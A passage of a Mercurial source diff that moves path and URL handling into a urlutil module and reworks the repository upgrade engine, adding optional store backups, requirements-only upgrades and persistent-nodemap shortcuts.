p.replace(b'%%', b'%') p = util.expandpath(p) - if not util.hasscheme(p) and not os.path.isabs(p): + if not urlutil.hasscheme(p) and not os.path.isabs(p): p = os.path.normpath(os.path.join(root, p)) - c.set(b"paths", n, p) + c.alter(b"paths", n, p) if section in (None, b'ui'): # update ui options @@ -655,11 +662,18 @@ msg %= (section, name, pycompat.bytestr(default)) self.develwarn(msg, 2, b'warn-config-default') + candidates = [] + config = self._data(untrusted) for s, n in alternates: - candidate = self._data(untrusted).get(s, n, None) + candidate = config.get(s, n, None) if candidate is not None: - value = candidate - break + candidates.append((s, n, candidate)) + if candidates: + + def level(x): + return config.level(x[0], x[1]) + + value = max(candidates, key=level)[2] if self.debugflag and not untrusted and self._reportuntrusted: for s, n in alternates: @@ -1016,8 +1030,10 @@ def expandpath(self, loc, default=None): """Return repository location relative to cwd or from [paths]""" + msg = b'ui.expandpath is deprecated, use `get_*` functions from urlutil' + self.deprecwarn(msg, b'6.0') try: - p = self.paths.getpath(loc) + p = self.getpath(loc) if p: return p.rawloc except error.RepoError: @@ -1025,7 +1041,7 @@ if default: try: - p = self.paths.getpath(default) + p = self.getpath(default) if p: return p.rawloc except error.RepoError: @@ -1035,7 +1051,14 @@ @util.propertycache def paths(self): - return paths(self) + return urlutil.paths(self) + + def getpath(self, *args, **kwargs): + """see paths.getpath for details + + This method exist as `getpath` need a ui for potential warning message. + """ + return self.paths.getpath(self, *args, **kwargs) @property def fout(self): @@ -2159,192 +2182,6 @@ return util._estimatememory() -class paths(dict): - """Represents a collection of paths and their configs. - - Data is initially derived from ui instances and the config files they have - loaded. - """ - - def __init__(self, ui): - dict.__init__(self) - - for name, loc in ui.configitems(b'paths', ignoresub=True): - # No location is the same as not existing. - if not loc: - continue - loc, sub = ui.configsuboptions(b'paths', name) - self[name] = path(ui, name, rawloc=loc, suboptions=sub) - - def getpath(self, name, default=None): - """Return a ``path`` from a string, falling back to default. - - ``name`` can be a named path or locations. Locations are filesystem - paths or URIs. - - Returns None if ``name`` is not a registered path, a URI, or a local - path to a repo. - """ - # Only fall back to default if no path was requested. - if name is None: - if not default: - default = () - elif not isinstance(default, (tuple, list)): - default = (default,) - for k in default: - try: - return self[k] - except KeyError: - continue - return None - - # Most likely empty string. - # This may need to raise in the future. - if not name: - return None - - try: - return self[name] - except KeyError: - # Try to resolve as a local path or URI. - try: - # We don't pass sub-options in, so no need to pass ui instance. - return path(None, None, rawloc=name) - except ValueError: - raise error.RepoError(_(b'repository %s does not exist') % name) - - -_pathsuboptions = {} - - -def pathsuboption(option, attr): - """Decorator used to declare a path sub-option. - - Arguments are the sub-option name and the attribute it should set on - ``path`` instances. - - The decorated function will receive as arguments a ``ui`` instance, - ``path`` instance, and the string value of this option from the config. - The function should return the value that will be set on the ``path`` - instance. - - This decorator can be used to perform additional verification of - sub-options and to change the type of sub-options. - """ - - def register(func): - _pathsuboptions[option] = (attr, func) - return func - - return register - - -@pathsuboption(b'pushurl', b'pushloc') -def pushurlpathoption(ui, path, value): - u = util.url(value) - # Actually require a URL. - if not u.scheme: - ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) - return None - - # Don't support the #foo syntax in the push URL to declare branch to - # push. - if u.fragment: - ui.warn( - _( - b'("#fragment" in paths.%s:pushurl not supported; ' - b'ignoring)\n' - ) - % path.name - ) - u.fragment = None - - return bytes(u) - - -@pathsuboption(b'pushrev', b'pushrev') -def pushrevpathoption(ui, path, value): - return value - - -class path(object): - """Represents an individual path and its configuration.""" - - def __init__(self, ui, name, rawloc=None, suboptions=None): - """Construct a path from its config options. - - ``ui`` is the ``ui`` instance the path is coming from. - ``name`` is the symbolic name of the path. - ``rawloc`` is the raw location, as defined in the config. - ``pushloc`` is the raw locations pushes should be made to. - - If ``name`` is not defined, we require that the location be a) a local - filesystem path with a .hg directory or b) a URL. If not, - ``ValueError`` is raised. - """ - if not rawloc: - raise ValueError(b'rawloc must be defined') - - # Locations may define branches via syntax <base>#<branch>. - u = util.url(rawloc) - branch = None - if u.fragment: - branch = u.fragment - u.fragment = None - - self.url = u - self.branch = branch - - self.name = name - self.rawloc = rawloc - self.loc = b'%s' % u - - # When given a raw location but not a symbolic name, validate the - # location is valid. - if not name and not u.scheme and not self._isvalidlocalpath(self.loc): - raise ValueError( - b'location is not a URL or path to a local ' - b'repo: %s' % rawloc - ) - - suboptions = suboptions or {} - - # Now process the sub-options. If a sub-option is registered, its - # attribute will always be present. The value will be None if there - # was no valid sub-option. - for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions): - if suboption not in suboptions: - setattr(self, attr, None) - continue - - value = func(ui, self, suboptions[suboption]) - setattr(self, attr, value) - - def _isvalidlocalpath(self, path): - """Returns True if the given path is a potentially valid repository. - This is its own function so that extensions can change the definition of - 'valid' in this case (like when pulling from a git repo into a hg - one).""" - try: - return os.path.isdir(os.path.join(path, b'.hg')) - # Python 2 may return TypeError. Python 3, ValueError. - except (TypeError, ValueError): - return False - - @property - def suboptions(self): - """Return sub-options and their values for this path. - - This is intended to be used for presentation purposes. - """ - d = {} - for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions): - value = getattr(self, attr) - if value is not None: - d[subopt] = value - return d - - # we instantiate one globally shared progress bar to avoid # competing progress bars when multiple UI objects get created _progresssingleton = None diff --git a/mercurial/unionrepo.py b/mercurial/unionrepo.py --- a/mercurial/unionrepo.py +++ b/mercurial/unionrepo.py @@ -128,6 +128,7 @@ deltas, linkmapper, transaction, + alwayscache=False, addrevisioncb=None, duplicaterevisioncb=None, maybemissingparents=False, @@ -152,9 +153,9 @@ class unionmanifest(unionrevlog, manifest.manifestrevlog): - def __init__(self, opener, opener2, linkmapper): - manifest.manifestrevlog.__init__(self, opener) - manifest2 = manifest.manifestrevlog(opener2) + def __init__(self, nodeconstants, opener, opener2, linkmapper): + manifest.manifestrevlog.__init__(self, nodeconstants, opener) + manifest2 = manifest.manifestrevlog(nodeconstants, opener2) unionrevlog.__init__( self, opener, self.indexfile, manifest2, linkmapper ) @@ -204,7 +205,10 @@ @localrepo.unfilteredpropertycache def manifestlog(self): rootstore = unionmanifest( - self.svfs, self.repo2.svfs, self.unfiltered()._clrev + self.nodeconstants, + self.svfs, + self.repo2.svfs, + self.unfiltered()._clrev, ) return manifest.manifestlog( self.svfs, self, rootstore, self.narrowmatch() diff --git a/mercurial/upgrade.py b/mercurial/upgrade.py --- a/mercurial/upgrade.py +++ b/mercurial/upgrade.py @@ -118,6 +118,7 @@ up_actions, removed_actions, revlogs, + backup, ) if not run: @@ -215,12 +216,6 @@ backuppath = upgrade_engine.upgrade( ui, repo, dstrepo, upgrade_op ) - if not backup: - ui.status( - _(b'removing old repository content %s\n') % backuppath - ) - repo.vfs.rmtree(backuppath, forcibly=True) - backuppath = None finally: ui.status(_(b'removing temporary repository %s\n') % tmppath) diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -23,7 +23,7 @@ # list of requirements that request a clone of all revlog if added/removed RECLONES_REQUIREMENTS = { - b'generaldelta', + requirements.GENERALDELTA_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, } @@ -69,6 +69,18 @@ postdowngrademessage Message intended for humans which will be shown post an upgrade operation in which this improvement was removed + + touches_filelogs (bool) + Whether this improvement touches filelogs + + touches_manifests (bool) + Whether this improvement touches manifests + + touches_changelog (bool) + Whether this improvement touches changelog + + touches_requirements (bool) + Whether this improvement changes repository requirements """ def __init__(self, name, type, description, upgrademessage): @@ -78,6 +90,12 @@ self.upgrademessage = upgrademessage self.postupgrademessage = None self.postdowngrademessage = None + # By default for now, we assume every improvement touches + # all the things + self.touches_filelogs = True + self.touches_manifests = True + self.touches_changelog = True + self.touches_requirements = True def __eq__(self, other): if not isinstance(other, improvement): @@ -131,6 +149,12 @@ # operation in which this improvement was removed postdowngrademessage = None + # By default for now, we assume every improvement touches all the things + touches_filelogs = True + touches_manifests = True + touches_changelog = True + touches_requirements = True + def __init__(self): raise NotImplementedError() @@ -176,7 +200,7 @@ class fncache(requirementformatvariant): name = b'fncache' - _requirement = b'fncache' + _requirement = requirements.FNCACHE_REQUIREMENT default = True @@ -196,7 +220,7 @@ class dotencode(requirementformatvariant): name = b'dotencode' - _requirement = b'dotencode' + _requirement = requirements.DOTENCODE_REQUIREMENT default = True @@ -215,7 +239,7 @@ class generaldelta(requirementformatvariant): name = b'generaldelta' - _requirement = b'generaldelta' + _requirement = requirements.GENERALDELTA_REQUIREMENT default = True @@ -270,6 +294,12 @@ b' New shares will be created in safe mode.' ) + # upgrade only needs to change the requirements + touches_filelogs = False + touches_manifests = False + touches_changelog = False + touches_requirements = True + @registerformatvariant class sparserevlog(requirementformatvariant): @@ -298,22 +328,6 @@ @registerformatvariant -class sidedata(requirementformatvariant): - name = b'sidedata' - - _requirement = requirements.SIDEDATA_REQUIREMENT - - default = False - - description = _( - b'Allows storage of extra data alongside a revision, ' - b'unlocking various caching options.' - ) - - upgrademessage = _(b'Allows storage of extra data alongside a revision.') - - -@registerformatvariant class persistentnodemap(requirementformatvariant): name = b'persistent-nodemap' @@ -344,6 +358,15 @@ @registerformatvariant +class revlogv2(requirementformatvariant): + name = b'revlog-v2' + _requirement = requirements.REVLOGV2_REQUIREMENT + default = False + description = _(b'Version 2 of the revlog.') + upgrademessage = _(b'very experimental') + + +@registerformatvariant class removecldeltachain(formatvariant): name = b'plain-cl-delta' @@ -375,10 +398,21 @@ return True +_has_zstd = ( + b'zstd' in util.compengines + and util.compengines[b'zstd'].available() + and util.compengines[b'zstd'].revlogheader() +) + + @registerformatvariant class compressionengine(formatvariant): name = b'compression' - default = b'zlib' + + if _has_zstd: + default = b'zstd' + else: + default = b'zlib' description = _( b'Compresion algorithm used to compress data. ' @@ -408,7 +442,9 @@ # return the first valid value as the selection code would do for comp in compengines: if comp in util.compengines: - return comp + e = util.compengines[comp] + if e.available() and e.revlogheader(): + return comp # no valide compression found lets display it all for clarity return b','.join(compengines) @@ -629,6 +665,7 @@ upgrade_actions, removed_actions, revlogs_to_process, + backup_store, ): self.ui = ui self.new_requirements = new_requirements @@ -673,6 +710,75 @@ b're-delta-multibase' in self._upgrade_actions_names ) + # should this operation create a backup of the store + self.backup_store = backup_store + + # whether the operation touches different revlogs at all or not + self.touches_filelogs = self._touches_filelogs() + self.touches_manifests = self._touches_manifests() + self.touches_changelog = self._touches_changelog() + # whether the operation touches requirements file or not + self.touches_requirements = self._touches_requirements() + self.touches_store = ( + self.touches_filelogs + or self.touches_manifests + or self.touches_changelog + ) + # does the operation only touches repository requirement + self.requirements_only = ( + self.touches_requirements and not self.touches_store + ) + + def _touches_filelogs(self): + for a in self.upgrade_actions: + # in optimisations, we re-process the revlogs again + if a.type == OPTIMISATION: + return True + elif a.touches_filelogs: + return True + for a in self.removed_actions: + if a.touches_filelogs: + return True + return False + + def _touches_manifests(self): + for a in self.upgrade_actions: + # in optimisations, we re-process the revlogs again + if a.type == OPTIMISATION: + return True + elif a.touches_manifests: + return True + for a in self.removed_actions: + if a.touches_manifests: + return True + return False + + def _touches_changelog(self): + for a in self.upgrade_actions: + # in optimisations, we re-process the revlogs again + if a.type == OPTIMISATION: + return True + elif a.touches_changelog: + return True + for a in self.removed_actions: + if a.touches_changelog: + return True + return False + + def _touches_requirements(self): + for a in self.upgrade_actions: + # optimisations are used to re-process revlogs and does not result + # in a requirement being added or removed + if a.type == OPTIMISATION: + pass + elif a.touches_requirements: + return True + for a in self.removed_actions: + if a.touches_requirements: + return True + + return False + def _write_labeled(self, l, label): """ Utility function to aid writing of a list under one label @@ -760,9 +866,7 @@ """ return { # Introduced in Mercurial 0.9.2. - b'revlogv1', - # Introduced in Mercurial 0.9.2. - b'store', + requirements.STORE_REQUIREMENT, } @@ -784,9 +888,21 @@ } +def check_revlog_version(reqs): + """Check that the requirements contain at least one Revlog version""" + all_revlogs = { + requirements.REVLOGV1_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, + } + if not all_revlogs.intersection(reqs): + msg = _(b'cannot upgrade repository; missing a revlog version') + raise error.Abort(msg) + + def check_source_requirements(repo): """Ensure that no existing requirements prevent the repository upgrade""" + check_revlog_version(repo.requirements) required = requiredsourcerequirements(repo) missingreqs = required - repo.requirements if missingreqs: @@ -818,6 +934,8 @@ requirements.COPIESSDC_REQUIREMENT, requirements.NODEMAP_REQUIREMENT, requirements.SHARESAFE_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, + requirements.REVLOGV1_REQUIREMENT, } for name in compression.compengines: engine = compression.compengines[name] @@ -837,16 +955,17 @@ Extensions should monkeypatch this to add their custom requirements. """ supported = { - b'dotencode', - b'fncache', - b'generaldelta', - b'revlogv1', - b'store', + requirements.DOTENCODE_REQUIREMENT, + requirements.FNCACHE_REQUIREMENT, + requirements.GENERALDELTA_REQUIREMENT, + requirements.REVLOGV1_REQUIREMENT, # allowed in case of downgrade + requirements.STORE_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, requirements.SIDEDATA_REQUIREMENT, requirements.COPIESSDC_REQUIREMENT, requirements.NODEMAP_REQUIREMENT, requirements.SHARESAFE_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, } for name in compression.compengines: engine = compression.compengines[name] @@ -868,14 +987,16 @@ future, unknown requirements from accidentally being added. """ supported = { - b'dotencode', - b'fncache', - b'generaldelta', + requirements.DOTENCODE_REQUIREMENT, + requirements.FNCACHE_REQUIREMENT, + requirements.GENERALDELTA_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, requirements.SIDEDATA_REQUIREMENT, requirements.COPIESSDC_REQUIREMENT, requirements.NODEMAP_REQUIREMENT, requirements.SHARESAFE_REQUIREMENT, + requirements.REVLOGV1_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, } for name in compression.compengines: engine = compression.compengines[name] @@ -888,7 +1009,7 @@ def check_requirements_changes(repo, new_reqs): old_reqs = repo.requirements - + check_revlog_version(repo.requirements) support_removal = supportremovedrequirements(repo) no_remove_reqs = old_reqs - new_reqs - support_removal if no_remove_reqs: diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -21,27 +21,34 @@ requirements, revlog, scmutil, + store, util, vfs as vfsmod, ) +from ..revlogutils import nodemap -def _revlogfrompath(repo, path): +def _revlogfrompath(repo, rl_type, path): """Obtain a revlog from a repo path. An instance of the appropriate class is returned. """ - if path == b'00changelog.i': + if rl_type & store.FILEFLAGS_CHANGELOG: return changelog.changelog(repo.svfs) - elif path.endswith(b'00manifest.i'): - mandir = path[: -len(b'00manifest.i')] - return manifest.manifestrevlog(repo.svfs, tree=mandir) + elif rl_type & store.FILEFLAGS_MANIFESTLOG: + mandir = b'' + if b'/' in path: + mandir = path.rsplit(b'/', 1)[0] + return manifest.manifestrevlog( + repo.nodeconstants, repo.svfs, tree=mandir + ) else: - # reverse of "/".join(("data", path + ".i")) - return filelog.filelog(repo.svfs, path[5:-2]) + # drop the extension and the `data/` prefix + path = path.rsplit(b'.', 1)[0].split(b'/', 1)[1] + return filelog.filelog(repo.svfs, path) -def _copyrevlog(tr, destrepo, oldrl, unencodedname): +def _copyrevlog(tr, destrepo, oldrl, rl_type, unencodedname): """copy all relevant files for `oldrl` into `destrepo` store Files are copied "as is" without any transformation. The copy is performed @@ -49,7 +56,7 @@ content is compatible with format of the destination repository. """ oldrl = getattr(oldrl, '_revlog', oldrl) - newrl = _revlogfrompath(destrepo, unencodedname) + newrl = _revlogfrompath(destrepo, rl_type, unencodedname) newrl = getattr(newrl, '_revlog', newrl) oldvfs = oldrl.opener @@ -67,10 +74,7 @@ if copydata: util.copyfile(olddata, newdata) - if not ( - unencodedname.endswith(b'00changelog.i') - or unencodedname.endswith(b'00manifest.i') - ): + if rl_type & store.FILEFLAGS_FILELOG: destrepo.svfs.fncache.add(unencodedname) if copydata: destrepo.svfs.fncache.add(unencodedname[:-2] + b'.d') @@ -104,17 +108,18 @@ return sidedatacompanion -def matchrevlog(revlogfilter, entry): +def matchrevlog(revlogfilter, rl_type): """check if a revlog is selected for cloning. In other words, are there any updates which need to be done on revlog or it can be blindly copied. The store entry is checked against the passed filter""" - if entry.endswith(b'00changelog.i'): + if rl_type & store.FILEFLAGS_CHANGELOG: return UPGRADE_CHANGELOG in revlogfilter - elif entry.endswith(b'00manifest.i'): + elif rl_type & store.FILEFLAGS_MANIFESTLOG: return UPGRADE_MANIFEST in revlogfilter + assert rl_type & store.FILEFLAGS_FILELOG return UPGRADE_FILELOGS in revlogfilter @@ -123,6 +128,7 @@ dstrepo, tr, old_revlog, + rl_type, unencoded, upgrade_op, sidedatacompanion, @@ -130,11 +136,11 @@ ): """ returns the new revlog object created""" newrl = None - if matchrevlog(upgrade_op.revlogs_to_process, unencoded): + if matchrevlog(upgrade_op.revlogs_to_process, rl_type): ui.note( _(b'cloning %d revisions from %s\n') % (len(old_revlog), unencoded) ) - newrl = _revlogfrompath(dstrepo, unencoded) + newrl = _revlogfrompath(dstrepo, rl_type, unencoded) old_revlog.clone( tr, newrl, @@ -146,9 +152,9 @@ else: msg = _(b'blindly copying %s containing %i revisions\n') ui.note(msg % (unencoded, len(old_revlog))) - _copyrevlog(tr, dstrepo, old_revlog, unencoded) + _copyrevlog(tr, dstrepo, old_revlog, rl_type, unencoded) - newrl = _revlogfrompath(dstrepo, unencoded) + newrl = _revlogfrompath(dstrepo, rl_type, unencoded) return newrl @@ -189,11 +195,11 @@ # Perform a pass to collect metadata. This validates we can open all # source files and allows a unified progress bar to be displayed. - for unencoded, encoded, size in alldatafiles: - if not unencoded.endswith(b'.i'): + for rl_type, unencoded, encoded, size in alldatafiles: + if not rl_type & store.FILEFLAGS_REVLOG_MAIN: continue - rl = _revlogfrompath(srcrepo, unencoded) + rl = _revlogfrompath(srcrepo, rl_type, unencoded) info = rl.storageinfo( exclusivefiles=True, @@ -210,19 +216,19 @@ srcrawsize += rawsize # This is for the separate progress bars. - if isinstance(rl, changelog.changelog): - changelogs[unencoded] = rl + if rl_type & store.FILEFLAGS_CHANGELOG: + changelogs[unencoded] = (rl_type, rl) crevcount += len(rl) csrcsize += datasize crawsize += rawsize - elif isinstance(rl, manifest.manifestrevlog): - manifests[unencoded] = rl + elif rl_type & store.FILEFLAGS_MANIFESTLOG: + manifests[unencoded] = (rl_type, rl) mcount += 1 mrevcount += len(rl) msrcsize += datasize mrawsize += rawsize - elif isinstance(rl, filelog.filelog): - filelogs[unencoded] = rl + elif rl_type & store.FILEFLAGS_FILELOG: + filelogs[unencoded] = (rl_type, rl) fcount += 1 frevcount += len(rl) fsrcsize += datasize @@ -267,12 +273,13 @@ ) ) progress = srcrepo.ui.makeprogress(_(b'file revisions'), total=frevcount) - for unencoded, oldrl in sorted(filelogs.items()): + for unencoded, (rl_type, oldrl) in sorted(filelogs.items()): newrl = _perform_clone( ui, dstrepo, tr, oldrl, + rl_type, unencoded, upgrade_op, sidedatacompanion, @@ -306,12 +313,13 @@ progress = srcrepo.ui.makeprogress( _(b'manifest revisions'), total=mrevcount ) - for unencoded, oldrl in sorted(manifests.items()): + for unencoded, (rl_type, oldrl) in sorted(manifests.items()): newrl = _perform_clone( ui, dstrepo, tr, oldrl, + rl_type, unencoded, upgrade_op, sidedatacompanion, @@ -344,12 +352,13 @@ progress = srcrepo.ui.makeprogress( _(b'changelog revisions'), total=crevcount ) - for unencoded, oldrl in sorted(changelogs.items()): + for unencoded, (rl_type, oldrl) in sorted(changelogs.items()): newrl = _perform_clone( ui, dstrepo, tr, oldrl, + rl_type, unencoded, upgrade_op, sidedatacompanion, @@ -381,7 +390,7 @@ are cloned""" for path, kind, st in sorted(srcrepo.store.vfs.readdir(b'', stat=True)): # don't copy revlogs as they are already cloned - if path.endswith((b'.i', b'.d', b'.n', b'.nd')): + if store.revlog_type(path) is not None: continue # Skip transaction related files. if path.startswith(b'undo'): @@ -412,7 +421,10 @@ """ # TODO: don't blindly rename everything in store # There can be upgrades where store is not touched at all - util.rename(currentrepo.spath, backupvfs.join(b'store')) + if upgrade_op.backup_store: + util.rename(currentrepo.spath, backupvfs.join(b'store')) + else: + currentrepo.vfs.rmtree(b'store', forcibly=True) util.rename(upgradedrepo.spath, currentrepo.spath) @@ -436,6 +448,8 @@ """ assert srcrepo.currentwlock() assert dstrepo.currentwlock() + backuppath = None + backupvfs = None ui.status( _( @@ -444,79 +458,136 @@ ) ) - with dstrepo.transaction(b'upgrade') as tr: - _clonerevlogs( - ui, - srcrepo, - dstrepo, - tr, - upgrade_op, + if upgrade_op.requirements_only: + ui.status(_(b'upgrading repository requirements\n')) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + # if there is only one action and that is persistent nodemap upgrade + # directly write the nodemap file and update requirements instead of going + # through the whole cloning process + elif ( + len(upgrade_op.upgrade_actions) == 1 + and b'persistent-nodemap' in upgrade_op._upgrade_actions_names + and not upgrade_op.removed_actions + ): + ui.status( + _(b'upgrading repository to use persistent nodemap feature\n') + ) + with srcrepo.transaction(b'upgrade') as tr: + unfi = srcrepo.unfiltered() + cl = unfi.changelog + nodemap.persist_nodemap(tr, cl, force=True) + # we want to directly operate on the underlying revlog to force + # create a nodemap file. This is fine since this is upgrade code + # and it heavily relies on repository being revlog based + # hence accessing private attributes can be justified + nodemap.persist_nodemap( + tr, unfi.manifestlog._rootstore._revlog, force=True + ) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + elif ( + len(upgrade_op.removed_actions) == 1 + and [ + x + for x in upgrade_op.removed_actions + if x.name == b'persistent-nodemap' + ] + and not upgrade_op.upgrade_actions + ): + ui.status( + _(b'downgrading repository to not use persistent nodemap feature\n') + ) + with srcrepo.transaction(b'upgrade') as tr: + unfi = srcrepo.unfiltered() + cl = unfi.changelog + nodemap.delete_nodemap(tr, srcrepo, cl) + # check comment 20 lines above for accessing private attributes + nodemap.delete_nodemap( + tr, srcrepo, unfi.manifestlog._rootstore._revlog + ) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + else: + with dstrepo.transaction(b'upgrade') as tr: + _clonerevlogs( + ui, + srcrepo, + dstrepo, + tr, + upgrade_op, + ) + + # Now copy other files in the store directory. + for p in _files_to_copy_post_revlog_clone(srcrepo): + srcrepo.ui.status(_(b'copying %s\n') % p) + src = srcrepo.store.rawvfs.join(p) + dst = dstrepo.store.rawvfs.join(p) + util.copyfile(src, dst, copystat=True) + + finishdatamigration(ui, srcrepo, dstrepo, requirements) + + ui.status(_(b'data fully upgraded in a temporary repository\n')) + + if upgrade_op.backup_store: + backuppath = pycompat.mkdtemp( + prefix=b'upgradebackup.', dir=srcrepo.path + ) + backupvfs = vfsmod.vfs(backuppath) + + # Make a backup of requires file first, as it is the first to be modified. + util.copyfile( + srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires') + ) + + # We install an arbitrary requirement that clients must not support + # as a mechanism to lock out new clients during the data swap. This is + # better than allowing a client to continue while the repository is in + # an inconsistent state. + ui.status( + _( + b'marking source repository as being upgraded; clients will be ' + b'unable to read from repository\n' + ) + ) + scmutil.writereporequirements( + srcrepo, srcrepo.requirements | {b'upgradeinprogress'} ) - # Now copy other files in the store directory. - for p in _files_to_copy_post_revlog_clone(srcrepo): - srcrepo.ui.status(_(b'copying %s\n') % p) - src = srcrepo.store.rawvfs.join(p) - dst = dstrepo.store.rawvfs.join(p) - util.copyfile(src, dst, copystat=True) - - finishdatamigration(ui, srcrepo, dstrepo, requirements) - - ui.status(_(b'data fully upgraded in a temporary repository\n')) - - backuppath = pycompat.mkdtemp(prefix=b'upgradebackup.', dir=srcrepo.path) - backupvfs = vfsmod.vfs(backuppath) - - # Make a backup of requires file first, as it is the first to be modified. - util.copyfile(srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires')) - - # We install an arbitrary requirement that clients must not support - # as a mechanism to lock out new clients during the data swap. This is - # better than allowing a client to continue while the repository is in - # an inconsistent state. - ui.status( - _( - b'marking source repository as being upgraded; clients will be ' - b'unable to read from repository\n' - ) - ) - scmutil.writereporequirements( - srcrepo, srcrepo.requirements | {b'upgradeinprogress'} - ) + ui.status(_(b'starting in-place swap of repository data\n')) + if upgrade_op.backup_store: + ui.status( + _(b'replaced files will be backed up at %s\n') % backuppath + ) - ui.status(_(b'starting in-place swap of repository data\n')) - ui.status(_(b'replaced files will be backed up at %s\n') % backuppath) - - # Now swap in the new store directory. Doing it as a rename should make - # the operation nearly instantaneous and atomic (at least in well-behaved - # environments). - ui.status(_(b'replacing store...\n')) - tstart = util.timer() - _replacestores(srcrepo, dstrepo, backupvfs, upgrade_op) - elapsed = util.timer() - tstart - ui.status( - _( - b'store replacement complete; repository was inconsistent for ' - b'%0.1fs\n' + # Now swap in the new store directory. Doing it as a rename should make + # the operation nearly instantaneous and atomic (at least in well-behaved + # environments). + ui.status(_(b'replacing store...\n')) + tstart = util.timer() + _replacestores(srcrepo, dstrepo, backupvfs, upgrade_op) + elapsed = util.timer() - tstart + ui.status( + _( + b'store replacement complete; repository was inconsistent for ' + b'%0.1fs\n' + ) + % elapsed ) - % elapsed - ) - # We first write the requirements file. Any new requirements will lock - # out legacy clients. - ui.status( - _( - b'finalizing requirements file and making repository readable ' - b'again\n' + # We first write the requirements file. Any new requirements will lock + # out legacy clients. + ui.status( + _( + b'finalizing requirements file and making repository readable ' + b'again\n' + ) ) - ) - scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) - # The lock file from the old store won't be removed because nothing has a - # reference to its new location. So clean it up manually. Alternatively, we - # could update srcrepo.svfs and other variables to point to the new - # location. This is simpler. - assert backupvfs is not None # help pytype - backupvfs.unlink(b'store/lock') + if upgrade_op.backup_store: + # The lock file from the old store won't be removed because nothing has a + # reference to its new location. So clean it up manually. Alternatively, we + # could update srcrepo.svfs and other variables to point to the new + # location. This is simpler. + assert backupvfs is not None # help pytype + backupvfs.unlink(b'store/lock') return backuppath diff --git a/mercurial/url.py b/mercurial/url.py --- a/mercurial/url.py +++ b/mercurial/url.py @@ -1,6 +1,6 @@ # url.py - HTTP handling for mercurial # -# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # @@ -26,7 +26,10 @@ urllibcompat, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) httplib = util.httplib stringio = util.stringio @@ -75,17 +78,17 @@ user, passwd = auth.get(b'username'), auth.get(b'password') self.ui.debug(b"using auth.%s.* for authentication\n" % group) if not user or not passwd: - u = util.url(pycompat.bytesurl(authuri)) + u = urlutil.url(pycompat.bytesurl(authuri)) u.query = None if not self.ui.interactive(): raise error.Abort( _(b'http authorization required for %s') - % util.hidepassword(bytes(u)) + % urlutil.hidepassword(bytes(u)) ) self.ui.write( _(b"http authorization required for %s\n") - % util.hidepassword(bytes(u)) + % urlutil.hidepassword(bytes(u)) ) self.ui.write(_(b"realm: %s\n") % pycompat.bytesurl(realm)) if user: @@ -128,7 +131,7 @@ proxyurl.startswith(b'http:') or proxyurl.startswith(b'https:') ): proxyurl = b'http://' + proxyurl + b'/' - proxy = util.url(proxyurl) + proxy = urlutil.url(proxyurl) if not proxy.user: proxy.user = ui.config(b"http_proxy", b"user") proxy.passwd = ui.config(b"http_proxy", b"passwd") @@ -155,7 +158,9 @@ # expects them to be. proxyurl = str(proxy) proxies = {'http': proxyurl, 'https': proxyurl} - ui.debug(b'proxying through %s\n' % util.hidepassword(bytes(proxy))) + ui.debug( + b'proxying through %s\n' % urlutil.hidepassword(bytes(proxy)) + ) else: proxies = {} @@ -219,7 +224,7 @@ new_tunnel = False if new_tunnel or tunnel_host == urllibcompat.getfullurl(req): # has proxy - u = util.url(pycompat.bytesurl(tunnel_host)) + u = urlutil.url(pycompat.bytesurl(tunnel_host)) if new_tunnel or u.scheme == b'https': # only use CONNECT for HTTPS h.realhostport = b':'.join([u.host, (u.port or b'443')]) h.headers = req.headers.copy() @@ -675,7 +680,7 @@ def open(ui, url_, data=None, sendaccept=True): - u = util.url(url_) + u = urlutil.url(url_) if u.scheme: u.scheme = u.scheme.lower() url_, authinfo = u.authinfo() diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -1,7 +1,7 @@ # util.py - Mercurial utility functions and platform specific implementations # # Copyright 2005 K. Thananchayan <thananck@yahoo.com> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the @@ -28,7 +28,6 @@ import platform as pyplatform import re as remod import shutil -import socket import stat import sys import time @@ -57,8 +56,18 @@ hashutil, procutil, stringutil, + urlutil, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Iterator, + List, + Optional, + Tuple, + ) + + base85 = policy.importmod('base85') osutil = policy.importmod('osutil') @@ -133,6 +142,7 @@ def setumask(val): + # type: (int) -> None ''' updates the umask. used by chg server ''' if pycompat.iswindows: return @@ -307,7 +317,7 @@ try: - buffer = buffer + buffer = buffer # pytype: disable=name-error except NameError: def buffer(sliceable, offset=0, length=None): @@ -1254,7 +1264,8 @@ """call this before writes, return self or a copied new object""" if getattr(self, '_copied', 0): self._copied -= 1 - return self.__class__(self) + # Function 